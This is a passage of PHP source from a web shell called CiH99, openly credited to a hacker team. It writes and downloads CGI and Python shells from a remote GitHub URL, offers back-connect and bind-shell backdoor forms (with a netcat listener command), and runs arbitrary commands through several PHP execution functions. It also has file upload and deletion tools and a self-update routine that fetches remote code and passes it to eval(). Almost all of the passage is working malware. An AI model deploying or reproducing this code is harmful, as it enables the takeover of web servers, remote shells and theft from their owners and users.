3232PX4gcy9cKy8gL2cgOw0KICAgICAgJHZhbHVlID1+IHMvJSguLikvcGFjaygnYycsaGV4KCQxKSkv
3233ZWc7DQoNCiAgICAgICRyZXR7JHZhcn0gPSAkdmFsdWU7DQogICAgfQ0KICB9DQoNCiAgcmV0dXJu
3234ICVyZXQ7DQp9';
3235
3236 $file = fopen("cmd.cih" ,"w+");
3237 $write = fwrite ($file ,base64_decode($cmdcih));
3238 fclose($file);
3239 chmod("cmd.cih",0755);
3240 echo "</br><a href='bypass/cmdrun/cmd.cih' target='_blank'> Go To [Cmd Run] </a>";
3241 break;
3242
3243 case "Python_Shell":
3244
3245 @mkdir('bypass/python', 0755);
3246 chdir('bypass/python');
3247 $cih = ".htaccess";
3248 $cih_note = "$cih";
3249 $zh = fopen ($cih_note , 'w') or die ("zh açılamadı!");
3250 $htcss = "AddHandler cgi-script .cih";
3251 fwrite ( $zh , $htcss ) ;
3252 fclose ($zh);
3253 $cihpy=file_get_contents('https://raw.githubusercontent.com/CiH777/bypass/master/cihpy');
3254 $file = fopen("python.cih" ,"w+");
3255 $write = fwrite ($file ,$cihpy);
3256 fclose($file);
3257 chmod("python.cih",0755);
3258 echo "</br><a href='bypass/python/python.cih' target='_blank'> Go To [Python Shell] </a>";
3259 break;
3260
3261 }
3262}
3263
3264if ($act == "vuln") {
3265 echo "<p><b>.: Select Vulnerability Tool :.</b></p>";
3266 echo "<form method='POST' > <p>
3267<select name='vuln_type'>
3268<option value='vuln_lab'>VULNERABILITY LAB - SECURITY RESEARCH</option>
3269<option value='vuln_exploit'>Exploits Database by Offensive Security</option>
3270<option value='vuln_1337'>1337day Inj3ct0r Exploit Database</option>
3271<option value='vuln_focus'>SecurityFocus</option>
3272<option value='vuln_40833'>Code Exploits Collection (40833 exploits)</option>
3273</select>
3274<input type='submit' value='Go ' />
3275</p></form>";
3276 $vu_cih = $_POST['vuln_type'];
3277 switch ($vu_cih) {
3278 case "vuln_lab":
3279 echo "</br><a href='http://adf.ly/q1ph4' target='_blank'> Go To [VULNERABILITY LAB - SECURITY RESEARCH LABORATORY] </a>";
3280 break;
3281
3282 case "vuln_exploit":
3283 echo "</br><a href='http://adf.ly/q1pj7' target='_blank'> Go To [Exploits Database by Offensive Security] </a>";
3284 break;
3285
3286 case "vuln_1337":
3287 echo "</br><a href='http://adf.ly/q1ppV' target='_blank'> Go To [1337day Inj3ct0r Exploit Database] </a>";
3288 break;
3289
3290 case "vuln_focus":
3291 echo "</br><a href='http://adf.ly/q1pr1' target='_blank'> Go To [SecurityFocus] </a>";
3292 break;
3293
3294 case "vuln_40833":
3295 echo "</br><a href='http://adf.ly/q1ptF' target='_blank'> Go To [Code Exploits Collection (40833 exploits)] </a>";
3296 break;
3297
3298 }
3299}
3300
3301if ($act == "about") {
3302 echo "<p><b>.: About CiH99 :.</b></p>".
3303 "</br>Re-Coding, PHP, HTML, CSS and Encoder : CiH-Cipher Hacker v1.2<br>".
3304 "</br><b>By</b><br>".
3305 "</br><b>CiH_H@CkErZ Team [cih_hacker@yahoo.com]</b><br>".
3306 "</br>Report bugs to <a href='http://cihiq.com' target='_blank'> Go To [CiH_H@CkErZ Team] </a><br>";
3307}
3308if ($act == "backc") {
3309 $ip = $_SERVER["REMOTE_ADDR"];
3310 $msg = $_POST['backcconnmsg'];
3311 $emsg = $_POST['backcconnmsge'];
3312 echo("<center><b>.: Back-Connection :.</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=21212> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 21212</b>'<br><br></center>");
3313 echo("$msg");
3314 echo("$emsg");
3315}
3316if ($act == "cihb"){
3317 $msg = $_POST['backcconnmsg'];
3318 $emsg = $_POST['backcconnmsge'];
3319 echo("<center><b>.: Bind Shell Backdoor :.</b><br><br><form name=form method=POST>
3320 Bind Port: <input type='text' name='backconnectport' value='21212'>
3321 <input type='hidden' name='use' value='cihb'>
3322 <input type='submit' value='Install Backdoor'></form>");
3323 echo("$msg");
3324 echo("$emsg");
3325 echo("</center>");
3326}
3327echo "</td></tr></table>\n";
3328/*** COMMANDS PANEL ***/
3329?>
3330 <div class=bartitle><b>.: COMMANDS PANEL :.</b></div>
3331 <table class=mainpanel>
3332 <tr><td align=right>Command:</td>
3333 <td><form method="POST">
3334 <input type=hidden name=act value="cmd">
3335 <input type=hidden name="d" value="<?php echo $dispd; ?>">
3336 <input type="text" name="cmd" size="100" value="<?php echo htmlspecialchars($cmd); ?>">
3337 <input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute">
3338 </form>
3339 </td></tr>
3340 <tr><td align=right>Quick Commands:</td>
3341 <td><form method="POST">
3342 <input type=hidden name=act value="cmd">
3343 <input type=hidden name="d" value="<?php echo $dispd; ?>">
3344 <input type=hidden name="cmd_txt" value="1">
3345 <select name="cmd">
3346 <?php
3347 foreach ($cmdaliases as $als) {
3348 echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
3349 }
3350 foreach ($cmdaliases2 as $als) {
3351 echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
3352 }
3353 ?>
3354 </select> <input type=submit name=submit value="Execute">
3355 </form>
3356 </td></tr>
3357 <tr><td align=right>Upload:</td>
3358 <td><form method="POST" enctype="multipart/form-data">
3359 <input type=hidden name=act value="upload">
3360 <input type=hidden name="miniform" value="1">
3361 <input type="file" name="uploadfile"> <input type=submit name=submit value="Upload"> <?php echo $wdt." Max size: ". @ini_get("upload_max_filesize")."B"; ?>
3362 </form>
3363 </td></tr>
3364 <tr><td align=right>PHP Filesystem:</td>
3365 <td>
3366 <?php ##[ CiH_H@CkErZ TriCkz ]## ?>
3367 <script language="javascript">
3368 function set_arg(txt1,txt2) {
3369 document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
3370 document.forms.fphpfsys.arg1.value = txt1;
3371 document.forms.fphpfsys.arg2.value = txt2;
3372 }
3373 function chg_arg(num,txt1,txt2) {
3374 if (num==0) {
3375 document.forms.fphpfsys.arg1.type = "hidden";
3376 document.forms.fphpfsys.A1.type = "hidden";
3377 }
3378 if (num<=1) {
3379 document.forms.fphpfsys.arg2.type = "hidden";
3380 document.forms.fphpfsys.A2.type = "hidden";
3381 }
3382 if (num==2) {
3383 document.forms.fphpfsys.A1.type = "label";
3384 document.forms.fphpfsys.A2.type = "label";
3385 document.forms.fphpfsys.arg1.type = "text";
3386 document.forms.fphpfsys.arg2.type = "text";
3387 }
3388 document.forms.fphpfsys.A1.value = txt1 + ":";
3389 document.forms.fphpfsys.A2.value = txt2 + ":";
3390 }
3391 </script>
3392 <?php
3393 echo "<form name=\"fphpfsys\" method=\"POST\"><input type=hidden name=act value=\"phpfsys\"><input type=hidden name=d value=\"$dispd\">\r\n".
3394 "<select name=\"phpfsysfunc\">\r\n";
3395 foreach ($phpfsaliases as $als) {
3396 if ($als[1]==$phpfsysfunc) {
3397 echo "<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
3398 }
3399 else {
3400 echo "<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
3401 }
3402 }
3403 echo "</select>\r\n".
3404 "<input type=label name=A1 value=\"File:\" size=2 disabled> <input type=text name=arg1 size=40 value=\"".htmlspecialchars($arg1)."\">\r\n".
3405 "<input type=hidden name=A2 size=2 disabled> <input type=hidden name=arg2 size=50 value=\"".htmlspecialchars($arg2)."\">\r\n".
3406 "<input type=submit name=submit value=\"Execute\"><hr noshade size=1>\r\n";
3407 foreach ($ch_sourcez as $e => $o) {
3408 echo "<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\r\n";
3409 }
3410 echo "</form>\r\n";
3411 ?>
3412 </td></tr>
3413 <tr><td align=right>Search File:</td>
3414 <td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
3415 <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
3416 </form>
3417 </td></tr>
3418 <tr><td align=right>Create File:</td>
3419 <td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
3420 <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
3421 </form></td></tr>
3422 <tr><td align=right>View File:</td>
3423 <td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
3424 <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
3425 </form></td></tr>
3426 </table>
3427<?php footer(); ?>
3428 </body></html>
3429<?php
3430
3431###########################
3432## CiH99 CORE FUNCTIONS ##
3433###########################
3434function safemode() {
3435 if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
3436 else { return FALSE; }
3437}
3438function getdisfunc() {
3439 $disfunc = @ini_get("disable_functions");
3440 if (!empty($disfunc)) {
3441 $disfunc = str_replace(" ","",$disfunc);
3442 $disfunc = explode(",",$disfunc);
3443 }
3444 else { $disfunc= array(); }
3445 return $disfunc;
3446}
3447function enabled($func) {
3448 if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
3449 else { return FALSE; }
3450}
3451function ch99exec($cmd) {
3452 $output = "";
3453 if ( enabled("popen") ) {
3454 $h = popen($cmd.' 2>&1', 'r');
3455 if ( is_resource($h) ) {
3456 while ( !feof($h) ) { $output .= fread($h, 2096); }
3457 pclose($h);
3458 }
3459 }
3460 elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
3461 elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
3462 elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
3463 elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
3464 return $output;
3465}
3466function ch99exec2($cmd) {
3467 $output = "";
3468 if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
3469 elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
3470 elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
3471 elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
3472 elseif ( enabled("popen") ) {
3473 $h = popen($cmd.' 2>&1', 'r');
3474 if ( is_resource($h) ) {
3475 while ( !feof($h) ) { $output .= fread($h, 2096); }
3476 pclose($h);
3477 }
3478 }
3479 return $output;
3480}
3481function which($pr) {
3482 $path = ch99exec("which $pr");
3483 if(!empty($path)) { return $path; } else { return $pr; }
3484}
3485
3486function get_status() {
3487 function showstat($sup,$stat) {
3488 if ($stat=="on") { return "$sup: <font color=#00FF00><b>ON</b></font>"; }
3489 else { return "$sup: <font color=#FF9900><b>OFF</b></font>"; }
3490 }
3491 $arrfunc = array(
3492 array("MySQL","mysql_connect"),
3493 array("MSSQL","mssql_connect"),
3494 array("Oracle","ocilogon"),
3495 array("PostgreSQL","pg_connect"),
3496 array("Curl","curl_version"),
3497 );
3498 $arrcmd = array(
3499 array("Fetch","fetch --help"),
3500 array("wget","wget --help"),
3501 array("Perl","perl -v"),
3502 );
3503
3504 $statinfo = array();
3505 foreach ($arrfunc as $func) {
3506 if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
3507 else { $statinfo[] = showstat($func[0],"off"); }
3508 }
3509 $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
3510 foreach ($arrcmd as $cmd) {
3511 if (ch99exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
3512 else { $statinfo[] = showstat($cmd[0],"off"); }
3513 }
3514 return implode(" ",$statinfo);
3515}
3516function showdisfunc() {
3517 if ($disablefunc = @ini_get("disable_functions")) {
3518 return "<font color=#FF9900><b>".$disablefunc."</b></font>";
3519 }
3520 else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
3521}
3522function disp_drives($curdir,$surl) {
3523 $letters = "";
3524 $v = explode("\\",$curdir);
3525 $v = $v[0];
3526 foreach (range("A","Z") as $letter) {
3527 $bool = $isdiskette = $letter == "A";
3528 if (!$bool) { $bool = is_dir($letter.":\\"); }
3529 if ($bool) {
3530 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
3531 ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
3532 if ($letter.":" != $v) { $letters .= $letter; }
3533 else { $letters .= "<font color=yellow>".$letter."</font>"; }
3534 $letters .= "</a> ";
3535 }
3536 }
3537 if (!empty($letters)) { Return $letters; }
3538 else {Return "None"; }
3539}
3540function disp_freespace($curdrv) {
3541 $free = @disk_free_space($curdrv);
3542 $total = @disk_total_space($curdrv);
3543 if ($free === FALSE) { $free = 0; }
3544 if ($total === FALSE) { $total = 0; }
3545 if ($free < 0) { $free = 0; }
3546 if ($total < 0) { $total = 0; }
3547 $used = $total-$free;
3548 $free_percent = round(100/($total/$free),2)."%";
3549 $free = view_size($free);
3550 $total = view_size($total);
3551 return "$free of $total ($free_percent)";
3552}
3553## CiH99 UPDATE FUNCTIONS ##
3554function ch99getsource($fn) {
3555 global $cih99_sourcesurl;
3556 $array = array(
3557 "cih99.php" => "cih99.txt",
3558 );
3559 $name = $array[$fn];
3560 if ($name) {return file_get_contents($cih99_sourcesurl.$name);}
3561 else {return FALSE;}
3562}
3563function cih99_getupdate($update = TRUE) {
3564 $url = $GLOBALS["cih99_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["ch_ver"]))."&updatenow=".($updatenow?"1":"0");
3565 $data = @file_get_contents($url);
3566 if (!$data) { return "update cih99 connect to cih_hacker@yahoo.com"; }
3567 else {
3568 $data = ltrim($data);
3569 $string = substr($data,3,ord($data{2}));
3570 if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
3571 if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
3572 if ($data{0} == "\x99" and $data{1} == "\x03") {
3573 $string = explode("|",$string);
3574 if ($update) {
3575 $confvars = array();
3576 $sourceurl = $string[0];
3577 $source = file_get_contents($sourceurl);
3578 if (!$source) {return "Can't fetch update!";}
3579 else {
3580 $fp = fopen(__FILE__,"w");
3581 if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download cih99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
3582 else {
3583 fwrite($fp,$source);
3584 fclose($fp);
3585 return "Update completed!";
3586 }
3587 }
3588 }
3589 else {return "New version are available: ".$string[1];}
3590 }
3591 elseif ($data{0} == "\x99" and $data{1} == "\x04") {
3592 eval($string);
3593 return 1;
3594 }
3595 else {return "Error in protocol: segmentation failed! (".$data.") ";}
3596 }
3597}
3598function ch99_buff_prepare() {
3599 global $sess_data;
3600 global $act;
3601 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
3602 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
3603 $sess_data["copy"] = array_unique($sess_data["copy"]);
3604 $sess_data["cut"] = array_unique($sess_data["cut"]);
3605 sort($sess_data["copy"]);
3606 sort($sess_data["cut"]);
3607 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
3608 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
3609}
3610function ch99_sess_put($data) {
3611 global $sess_cookie;
3612 global $sess_data;
3613 ch99_buff_prepare();
3614 $sess_data = $data;
3615 $data = serialize($data);
3616 setcookie($sess_cookie,$data);
3617}
3618## END CiH99 UPDATE FUNCTIONS ##
3619## FILESYSTEM FUNCTIONS ##
3620function fs_copy_dir($d,$t) {
3621 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3622 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3623 $h = opendir($d);
3624 while (($o = readdir($h)) !== FALSE) {
3625 if (($o != ".") and ($o != "..")) {
3626 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
3627 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
3628 if (!$ret) {return $ret;}
3629 }
3630 }
3631 closedir($h);
3632 return TRUE;
3633}
3634function fs_copy_obj($d,$t) {
3635 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3636 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
3637 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
3638 if (is_dir($d)) {
3639 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3640 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
3641 return fs_copy_dir($d,$t);
3642 }
3643 elseif (is_file($d)) { return copy($d,$t); }
3644 else { return FALSE; }
3645}
3646function fs_move_dir($d,$t) {
3647 $h = opendir($d);
3648 if (!is_dir($t)) {mkdir($t);}
3649 while (($o = readdir($h)) !== FALSE) {
3650 if (($o != ".") and ($o != "..")) {
3651 $ret = TRUE;
3652 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
3653 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
3654 if (!$ret) {return $ret;}
3655 }
3656 }
3657 closedir($h);
3658 return TRUE;
3659}
3660function fs_move_obj($d,$t) {
3661 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3662 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
3663 if (is_dir($d)) {
3664 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3665 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
3666 return fs_move_dir($d,$t);
3667 }
3668 elseif (is_file($d)) {
3669 if(copy($d,$t)) {return unlink($d);}
3670 else {unlink($t); return FALSE;}
3671 }
3672 else {return FALSE;}
3673}
3674function fs_rmdir($d) {
3675 $h = opendir($d);
3676 while (($o = readdir($h)) !== FALSE) {
3677 if (($o != ".") and ($o != "..")) {
3678 if (!is_dir($d.$o)) {unlink($d.$o);}
3679 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
3680 }
3681 }
3682 closedir($h);
3683 rmdir($d);
3684 return !is_dir($d);
3685}
3686function fs_rmobj($o) {
3687 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
3688 if (is_dir($o)) {
3689 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
3690 return fs_rmdir($o);
3691 }
3692 elseif (is_file($o)) {return unlink($o);}
3693 else {return FALSE;}
3694}
3695## END FILESYSTEM FUNCTIONS ##
3696function onphpshutdown() {
3697 global $gzipencode,$ft;
3698 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
3699 $v = @ob_get_contents();
3700 @ob_end_clean();
3701 @ob_start("ob_gzHandler");
3702 echo $v;
3703 @ob_end_flush();
3704 }
3705}
3706function cih99exit() { onphpshutdown(); exit; }
3707
3708function ch99fsearch($d) {
3709 global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
3710 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3711 $h = opendir($d);
3712 while (($f = readdir($h)) !== FALSE) {
3713 if($f != "." && $f != "..") {
3714 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
3715 if (is_dir($d.$f)) {
3716 $search_i_d++;
3717 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
3718 if (!is_link($d.$f)) {ch99fsearch($d.$f);}
3719 }
3720 else {
3721 $search_i_f++;
3722 if ($bool) {
3723 if (!empty($a["text"])) {
3724 $r = @file_get_contents($d.$f);
3725 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
3726 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
3727 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
3728 else {$bool = strpos(" ".$r,$a["text"],1);}
3729 if ($a["text_not"]) {$bool = !$bool;}
3730 if ($bool) {$found[] = $d.$f; $found_f++;}
3731 }
3732 else {$found[] = $d.$f; $found_f++;}
3733 }
3734 }
3735 }
3736 }
3737 closedir($h);
3738}
3739function view_size($size) {
3740 if (!is_numeric($size)) { return FALSE; }
3741 else {
3742 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
3743 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
3744 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
3745 else {$size = $size . " B";}
3746 return $size;
3747 }
3748}
3749function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
3750function view_perms($mode) {
3751 if (($mode & 0xC000) === 0xC000) {$type = "s";}
3752 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
3753 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
3754 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
3755 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
3756 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
3757 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
3758 else {$type = "?";}
3759 $owner["read"] = ($mode & 00400)?"r":"-";
3760 $owner["write"] = ($mode & 00200)?"w":"-";
3761 $owner["execute"] = ($mode & 00100)?"x":"-";
3762 $group["read"] = ($mode & 00040)?"r":"-";
3763 $group["write"] = ($mode & 00020)?"w":"-";
3764 $group["execute"] = ($mode & 00010)?"x":"-";
3765 $world["read"] = ($mode & 00004)?"r":"-";
3766 $world["write"] = ($mode & 00002)? "w":"-";
3767 $world["execute"] = ($mode & 00001)?"x":"-";
3768 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
3769 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
3770 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
3771 return $type.join("",$owner).join("",$group).join("",$world);
3772}
3773function parse_perms($mode) {
3774 if (($mode & 0xC000) === 0xC000) {$t = "s";}
3775 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
3776 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
3777 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
3778 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
3779 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
3780 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
3781 else {$t = "?";}
3782 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
3783 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
3784 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
3785 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
3786}
3787function parsesort($sort) {
3788 $one = intval($sort);
3789 $second = substr($sort,-1);
3790 if ($second != "d") {$second = "a";}
3791 return array($one,$second);
3792}
3793function view_perms_color($o) {
3794 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
3795 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
3796 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
3797}
3798function str2mini($content,$len) {
3799 if (strlen($content) > $len) {
3800 $len = ceil($len/2) - 2;
3801 return substr($content, 0,$len)."...".substr($content,-$len);
3802 } else {return $content;}
3803}
3804function strips(&$arr,$k="") {
3805 if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
3806 else { $arr = stripslashes($arr); }
3807}
3808
3809function getmicrotime() {
3810 list($usec, $sec) = explode(" ", microtime());
3811 return ((float)$usec + (float)$sec);
3812}
3813
3814function ch_name() { return base64_decode("Q2lIX0hAQ2tFclogQ2lIOTkgdg==").ch_ver; }
3815function htmlhead($safemode) {
3816 $style = '
3817<style type="text/css">
3818body,table {font:8pt verdana;background-color:black;}
3819table {width:100%;}
3820table,td,#maininfo td {padding:3px;}
3821table,td,input,select,option {border:1px solid #808080;}
3822body,table,input,select,option {color:#FFFFFF;}
3823a {color:lightblue;text-decoration:none; } a:link {color:#5B5BFF;} a:hover {text-decoration:underline;} a:visited {color:#99CCFF;}
3824textarea {color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2;}
3825#pagebar {padding:5px;border:3px solid #1E1E1E;border-collapse:collapse;}
3826#pagebar td {vertical-align:top;}
3827#pagebar,#pagebar p,.info,input,select,option {font:8pt tahoma;}
3828#pagebar a {font-weight:bold;color:#00FF00;}
3829#pagebar a:visited {color:#00CE00;}
3830#mainmenu {text-align:center;}
3831#mainmenu a {text-align: center;padding: 0px 5px 0px 5px;}
3832#maininfo,.barheader,.bartitle {text-align:center;}
3833.fleft {float:left;text-align:left;}
3834.fright {float:right;text-align:right;}
3835.bartitle {padding:5px;border:2px solid #1F1F1F;}
3836.barheader {font-weight:bold;padding:5px;}
3837.info,.info td,.info th {margin:0;padding:0;border-collapse:collapse;}
3838.info th {color:#00FF00;text-align:left;width:13%;}
3839.contents,.explorer {border-collapse:collapse;}
3840.contents,.explorer td,th {vertical-align:top;}
3841.mainpanel {border-collapse:collapse;padding:5px;}
3842.barheader,.mainpanel table,td {border:1px solid #333333;}
3843input[type="submit"],input[type="button"] {border:1px solid #000000;}
3844input[type="text"] {padding:3px;}
3845.shell {background-color:#000000;color:#00FF00;padding:5px;font-size:12;}
3846.fxerrmsg {color:red; font-weight:bold;}
3847#pagebar,#pagebar p,h1,h2,h3,h4,form {margin:0;}
3848#pagebar,.mainpanel,input[type="submit"],input[type="button"] {background-color:#4A4A4A;}
3849.bartitle,input,select,option,input[type="submit"]:hover,input[type="button"]:hover {background-color:#333333;}
3850textarea,#pagebar input[type="text"],.mainpanel input[type="text"],input[type="file"],select,option {background-color:#000000;}
3851input[type="label"] { text-align:right;}
3852.info,.info td,input[type="label"] {border:0;background:none;}
3853</style>
3854';
3855 $html_start = '
3856<html><head>
3857<title>'.getenv("HTTP_HOST").' - '.ch_name().'</title>
3858'.$style.'
3859</head>
3860<body>
3861<div class=bartitle><h4>'.ch_name().'</h4>.: Fuck All System :.</div>
3862';
3863 return $html_start;
3864};
3865function footer() {
3866 echo "<div class=bartitle colspan=2><font size=1 color=#00FF00> .:[ Re-Coding By CiH_H@CkErZ | cih_hacker@yahoo.com | Generated: ".round(getmicrotime()-starttime,4)." seconds ]:. </font></div>";
3867}
3868echo '<link rel="shortcut icon" href="http://im65.gulfup.com/CfVSSL.png" />';
3869
3870chdir($lastdir); cih99exit();
3871?>